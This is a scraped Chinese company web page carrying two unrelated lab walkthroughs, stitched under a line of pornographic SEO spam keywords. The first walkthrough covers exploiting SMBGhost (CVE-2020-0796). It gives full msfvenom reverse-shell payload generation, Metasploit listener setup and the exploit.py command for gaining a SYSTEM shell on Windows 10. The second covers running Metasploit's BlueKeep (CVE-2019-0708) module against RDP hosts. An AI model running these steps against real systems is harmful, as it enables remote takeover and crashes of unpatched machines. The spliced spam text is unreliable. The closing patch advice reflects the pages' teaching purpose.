操屁眼的视频在线免费看,日本在线综合一区二区,久久在线观看免费视频,欧美日韩精品久久综

新聞資訊

    友情提示:

    初入安全,小白一個(gè),本文重在學(xué)習(xí)與經(jīng)驗(yàn)分享!!!

    背景

    微軟服務(wù)器消息塊3.1.1(SMBv3)協(xié)議處理某些請(qǐng)求的方式中存在一個(gè)遠(yuǎn)程執(zhí)行代碼漏洞,攻擊者可以通過(guò)此漏洞獲得在目標(biāo)服務(wù)器或客戶端上執(zhí)行代碼的能力,如:執(zhí)行DOS命令。

    1. 實(shí)驗(yàn)環(huán)境

    本次實(shí)驗(yàn)通過(guò)反彈shell,可直接獲取Windows 10系統(tǒng)的System權(quán)限。

    Kali Linux IP:192.168.0.11/24,或者安裝有MSF漏洞利用框架工具的計(jì)算機(jī)

    靶機(jī) IP:192.168.0.105/24,關(guān)閉windows自帶防火墻和網(wǎng)絡(luò)防火墻,確保網(wǎng)絡(luò)可ping通

    靶機(jī)系統(tǒng)版本:Windows 10 v1909

    POC:http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip(奇安信POC需要python 3以上的版本,本次實(shí)驗(yàn)python版本為3.8)

    EXP:https://github.com/chompie1337/SMBGhost_RCE_PoC

    注:github上有各種POC和EXP,如:藍(lán)屏、提權(quán)、代碼執(zhí)行、拿shell等,搜索并下載想要復(fù)現(xiàn)的POC或EXP即可。

    2. 漏洞編號(hào)

    CVE-2020-0796

    3. 漏洞影響范圍

    Windows 10 Version 1903 for 32-bit Systems

    Windows 10 Version 1903 for x64-based Systems

    Windows 10 Version 1903 for ARM64-based Systems

    Windows Server, Version 1903 (Server Core installation)

    Windows 10 Version 1909 for 32-bit Systems

    Windows 10 Version 1909 for x64-based Systems

    Windows 10 Version 1909 for ARM64-based Systems

    Windows Server, Version 1909 (Server Core installation)

    4. 漏洞復(fù)現(xiàn)過(guò)程

    4.1 漏洞探測(cè)

    利用奇安信POC工具,判斷靶機(jī)是否存在CVE-2020-0796漏洞。

    4.2 漏洞利用

    (1)使用kali自帶的Metasploit(MSF)工具生成shellcode代碼

    /* 參數(shù)含義

    arch指定系統(tǒng)為64系統(tǒng)

    platform指定系統(tǒng)平臺(tái)為windows平臺(tái)

    lhost指定攻擊IP地址為kali系統(tǒng)的IP

    lport指定反彈shell時(shí)本地連接所用的端口,隨意指定一個(gè)不在用的端口就行。

    */

    # shellcode生成命令

    msfvenom -p windows/x64/meterpreter/reverse_tcp --arch=x64 --platform=windows lhost=192.168.0.11 lport=4444 -f py -o win10_shellcode.txt

    (2)將生成的shellcode內(nèi)容復(fù)制并替換exploit.py文件中的USER_PAYLOAD內(nèi)容并保存。

    (3)將修改好的EXP文件夾上傳到kali中中任意目錄下。

    (4)運(yùn)行kali自帶的MSF工具,并執(zhí)行反彈shell的監(jiān)聽(tīng)

    # 啟用MSF

    msfconsole

    # 設(shè)置監(jiān)聽(tīng)參數(shù)

    msf6 > use exploit/multi/handler

    msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

    msf6 exploit(multi/handler) > set lhost 192.168.0.11

    msf6 exploit(multi/handler) > set lport 4444

    # 查看反彈shell的監(jiān)聽(tīng)配置是否正確

    msf6 exploit(multi/handler) > show options

    # 檢查配置無(wú)誤,運(yùn)行監(jiān)聽(tīng)

    msf6 exploit(multi/handler) > run

    # 運(yùn)行監(jiān)聽(tīng)后,再執(zhí)行EXP中的exploit.py文件。如果執(zhí)行過(guò)程提示無(wú)權(quán)限,可執(zhí)行chmod 777 exploit.py解決。

    python3 exploit.py -ip 192.168.0.105

    (5)查看kali的監(jiān)聽(tīng)狀態(tài),靶機(jī)如果有漏洞,會(huì)獲得靶機(jī)反彈的shell,復(fù)現(xiàn)成功。

    (6)在meterpreter命令行下,敲"shell"命令,可以進(jìn)入靶機(jī)的DOS環(huán)境。

    5. 安全建議

    及時(shí)更新Windows 10系統(tǒng)安全補(bǔ)丁。

    軍訓(xùn)終于結(jié)束了,我從一個(gè)比較白的小伙紙變成了一個(gè)挖煤工人

    拖更了那么多天,和大家陪個(gè)不是,這不,剛下火車(chē),到家就更新。msf前幾天更新了cve_2019_0708_bluekeep_rce 的exp,實(shí)驗(yàn)了一下,百試百靈。哈哈哈(滑稽)

    簡(jiǎn)單介紹

    Windows再次被曝出一個(gè)破壞力巨大的高危遠(yuǎn)程漏洞CVE-2019-0708。攻擊者一旦成功利用該漏洞,便可以在目標(biāo)系統(tǒng)上執(zhí)行任意代碼,包括獲取敏感信息、執(zhí)行遠(yuǎn)程代碼、發(fā)起拒絕服務(wù)攻擊等等攻擊行為。而更加嚴(yán)重的是,這個(gè)漏洞的觸發(fā)無(wú)需用戶交互,攻擊者可以用該漏洞制作堪比2017年席卷全球的WannaCry類蠕蟲(chóng)病毒,從而進(jìn)行大規(guī)模傳播和破壞。

    影響范圍

    • Windows 7
    • Windows Server 2008 R2
    • Windows Server 2008
    • Windows 2003
    • Windows XP

    只要你開(kāi)了遠(yuǎn)程桌面就有被攻擊的可能,win10笑出了聲。

    漏洞復(fù)現(xiàn)

    首先你得有msf的框架,可以自行去官網(wǎng)下載,或者kali內(nèi)內(nèi)置的也可以,但如果不是v5.0.50-dev 的就需要升級(jí)一下軟件了。

    輸入

    search cve-2019
    

    exp

    我選中的這個(gè)就是exp了。再次輸入命令

    use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 
    

    輸入show options ,查看設(shè)置頁(yè)面

    設(shè)置好ip地址,和payload。

    關(guān)鍵的地方來(lái)了,這里需要注意的是,設(shè)置目標(biāo)種類

    輸入show target

    根據(jù)需要選擇,如果選錯(cuò)了,那么被攻擊主機(jī)就會(huì)藍(lán)屏。有點(diǎn)坑

    準(zhǔn)備就緒,就可以開(kāi)始攻擊了

    雖然攻擊沒(méi)成功,但是也成功的讓目標(biāo)主機(jī)藍(lán)屏,如果有針對(duì)的版本就可以建立shell連接,可能是我之前攻擊過(guò)的原因,現(xiàn)在導(dǎo)致一直無(wú)法建立連接。

    小結(jié)

    1.安裝微軟發(fā)布的安全更新補(bǔ)丁

    Microsoft官方已經(jīng)在 2019年5月14日修復(fù)了該漏洞,用戶可以通過(guò)安裝微軟的安全更新來(lái)給系統(tǒng)打上安全補(bǔ)丁,下載地址為:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

    以及為已不受微軟更新支持的系統(tǒng)(Windows Server 2003和Windows XP)提供的安全更新,下載地址:https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708

    2. 在無(wú)法及時(shí)安裝微軟安全更新的情況下作為臨時(shí)性解決方案

    若用戶不需要用到遠(yuǎn)程桌面服務(wù),建議禁用該服務(wù)。

    如果由于某些原因安裝補(bǔ)丁不成功,或者因?yàn)槠渌虿荒馨惭b補(bǔ)丁,建議采取緩解措施,win7或win server 2008 r2里選擇“我的電腦”→“屬性”→“遠(yuǎn)程設(shè)置”→“遠(yuǎn)程”,啟用網(wǎng)路級(jí)認(rèn)證(NLA)

    本文作者:Whitezero,轉(zhuǎn)載請(qǐng)注明原鏈接。

網(wǎng)站首頁(yè)   |    關(guān)于我們   |    公司新聞   |    產(chǎn)品方案   |    用戶案例   |    售后服務(wù)   |    合作伙伴   |    人才招聘   |   

友情鏈接: 餐飲加盟

地址:北京市海淀區(qū)    電話:010-     郵箱:@126.com

備案號(hào):冀ICP備2024067069號(hào)-3 北京科技有限公司版權(quán)所有